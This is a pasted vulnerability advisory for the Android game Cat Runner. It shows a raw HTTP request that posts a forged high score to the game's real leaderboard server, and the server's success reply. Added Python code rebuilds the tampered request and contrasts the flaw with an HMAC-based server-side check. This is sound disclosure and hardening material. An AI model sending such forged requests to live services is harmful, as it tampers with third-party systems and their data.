CatRunner
Apr 23rd, 2019
# Cat Runner: Decorate Home - External Control of Assumed-Immutable Web Parameter
# Date: Jan 17, 2019
# Software Link: https://play.google.com/store/apps/details?id=com.solou.catendless.run&hl=en
# Version: 2.8.0 Android App
# Vendor: Ivy
# Exploit Author: Loc Phan Van
# Category: Mobile Apps
# Tested on: Android 8.1

# Description
# The application's API does not verify request parameters that it treats as immutable but
# that are in fact under the client's control. The game client reports the player's score to
# the leaderboard endpoint (/index/commit) as a plain form field, and the server accepts
# whatever value is supplied without any server-side validation. An attacker who intercepts
# or replays this request can therefore set an arbitrary score for their own uid and have it
# recorded. In the capture below, a score of 151414141 is accepted with "status":1.

# PoC

Request:

POST //index/commit HTTP/1.1
Content-type: application/x-www-form-urlencoded
X-Unity-Version: 5.6.4f1
User-agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; SN-G920V Build/LVY47X)
Host: card.matchJplay.com
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 89

uid=1aef329eb95be620abfa417d20112b2e&appid=2419&tag=Highschore&score=151414141&week201903

Response:

HTTP/1.1 200 OK
Server: nginx/1.14.0
Date: Thu, 17 Jan 2019 03:49:55 GMT
Content-type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.6
Content-Length: 28

{"status":1,"msg":"success"}

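As an added example (not code from the advisory, the author or the vendor), the following Python reproduces the tampering step offline and contrasts the observed server behaviour with the kind of server-side check the endpoint evidently lacks. The endpoint path, form field names and the {"status":1,"msg":"success"} response shape are taken from the captured traffic above; SERVER_KEY, the run token, MAX_POINTS_PER_SECOND and the in-memory LEADERBOARD are illustrative assumptions and were not observed in the application.

```python
# Added example (not part of the advisory): reproduce the parameter tampering offline
# and contrast the observed "accept any score" behaviour with a plausibility check.
# Endpoint, field names and the {"status":1} response come from the captured traffic;
# SERVER_KEY, the run token and the points-per-second cap are illustrative assumptions.
import hashlib
import hmac

# Constructed copy of the form body from the captured PoC request above.
CAPTURED_BODY = ("uid=1aef329eb95be620abfa417d20112b2e&appid=2419"
                 "&tag=Highschore&score=151414141&week201903")


def parse_form(body):
    """Form body -> dict. Bare tokens without '=' (like 'week201903') are skipped."""
    return dict(tok.split("=", 1) for tok in body.split("&") if "=" in tok)


def tamper(body, **overrides):
    """Replace named fields in a captured body, leaving every other token byte-for-byte
    intact, and return (new_body, content_length) so the header can be recomputed."""
    out = []
    for tok in body.split("&"):
        name = tok.split("=", 1)[0] if "=" in tok else None
        out.append(f"{name}={overrides[name]}" if name in overrides else tok)
    new_body = "&".join(out)
    return new_body, len(new_body.encode())


def build_request(body, host="card.matchJplay.com", path="//index/commit"):
    """Raw HTTP/1.1 request text shaped like the captured one, with a correct Content-Length."""
    headers = [
        f"POST {path} HTTP/1.1",
        "Content-type: application/x-www-form-urlencoded",
        f"Host: {host}",
        "Connection: close",
        f"Content-Length: {len(body.encode())}",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


LEADERBOARD = {}  # (uid, tag) -> best score; stands in for the server's datastore


def vulnerable_commit(form):
    """Mirrors the observed behaviour: whatever score the client sends is stored."""
    try:
        score = int(form["score"])
    except (KeyError, ValueError):
        return {"status": 0, "msg": "bad request"}
    LEADERBOARD[(form.get("uid", ""), form.get("tag", ""))] = score
    return {"status": 1, "msg": "success"}


# --- Illustrative hardening: make the server the authority on how long a run lasted ---
SERVER_KEY = b"example-only-server-secret"  # assumption; must never ship inside the APK
MAX_POINTS_PER_SECOND = 50                   # assumption; derive from real gameplay data


def issue_run_token(uid, start_ts):
    """Handed to the client when a run starts: binds uid to a server-side start time."""
    mac = hmac.new(SERVER_KEY, f"{uid}:{start_ts}".encode(), hashlib.sha256).hexdigest()
    return f"{start_ts}.{mac}"


def hardened_commit(form, now):
    """Accept a score only if its run token verifies and the score is plausible for the
    server-measured duration. The client still reports the score, so this bounds cheating
    rather than eliminating it; computing the score server-side would eliminate it."""
    uid = form.get("uid", "")
    try:
        start_ts, mac = form["run"].split(".", 1)
        start_ts = int(start_ts)
        score = int(form["score"])
    except (KeyError, ValueError):
        return {"status": 0, "msg": "malformed"}
    expected = hmac.new(SERVER_KEY, f"{uid}:{start_ts}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return {"status": 0, "msg": "bad run token"}
    elapsed = now - start_ts
    if elapsed <= 0 or not 0 <= score <= elapsed * MAX_POINTS_PER_SECOND:
        return {"status": 0, "msg": "implausible score"}
    key = (uid, form.get("tag", ""))
    LEADERBOARD[key] = max(score, LEADERBOARD.get(key, 0))
    return {"status": 1, "msg": "success"}


if __name__ == "__main__":
    body, length = tamper(CAPTURED_BODY, score="999999")
    print(build_request(body))
    print(vulnerable_commit(parse_form(CAPTURED_BODY)))   # accepted, as in the capture
    form = dict(parse_form(CAPTURED_BODY),
                run=issue_run_token("1aef329eb95be620abfa417d20112b2e", 1000))
    print(hardened_commit(form, now=1060))                # rejected: 151414141 in 60 s
```

The point of the hardened variant is that the only trustworthy input is state the server itself recorded (here, when the run started), so the submitted score can be bounded against it. Any secret or signing logic placed in the client instead can be recovered from the APK, which is why client-side "integrity" checks alone do not close this class of bug.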
References:
https://www.youtube.com/watch?v=u5iEeLZnYVg